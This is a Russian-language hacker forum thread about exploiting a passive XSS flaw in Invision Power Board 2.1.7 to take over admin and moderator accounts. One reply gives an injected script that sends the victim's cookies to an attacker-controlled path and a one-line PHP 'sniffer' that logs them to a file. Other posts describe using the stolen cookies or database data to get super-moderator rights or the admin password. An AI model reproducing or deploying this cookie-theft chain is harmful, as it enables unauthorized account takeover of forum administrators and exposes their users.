|
Xss в Ipb 2.1.7
Давайте поподробнее поговорим об пассивном Xss в Ibp 2.1.7.
Предупреждаю - опыта у меня ой как мало и понимаю маловато, поэтому и пришел сюда. Фичу с внедрением алерта в заголовок ЛС я усвоил. Но мелькало что-то про модеров... чего там можно добиться? И до чего вобще можно дойти, используя этот Xss? Только с описанием поподробней плз. |
XSS - Cross Site Scripting
Данная бага позволяет тебе украсть куки. Требуется чтоб админ глянул эту страничку с XSS скриптом - ты получишь куки, которые тебе обеспечат доступ. Для того чтобы получить куки тебе понадобится сниффер - скрипт который приймет сигнал от XSS скрипта и запишет куки. XSS скрипт: Код:
<script>img = new Image(); img.src='_PATH_';</script>Пример XSS + sniff Код:
<script>img = new Image(); img.src='_PATH_';</script>Код:
<? fputs(fopen("log.txt","a+"),$_SERVER['QUERY_STRING']); |
Хм, админ должен заглянуть на страничку с Xss... Т.е. в случае с ИБП он должен просто отурыть мое ЛС, в заголовке которого и будет Xss?
И вопрос наперед - когда я получу куки, что надо будет сделать для их расшифровки, дабы получить пароль? Просто залогиниться не устраивает =( |
Используя XSS ты можешь получить права супермодера. Об этом говорили подробно много раз.
Я не считаю нужным оставлять тему открытой ибо, либо куки с xss = супермодер, либо инфа с базы и => пасс админа. Закрыто. ПС: Я пожалуй предупрежу: Если ты маловато знаешь - попробуй узнать больше своими силами, тут тебе не faq. |
Юзай поиск. Все ответы есть.
|
| Время: 04:09 |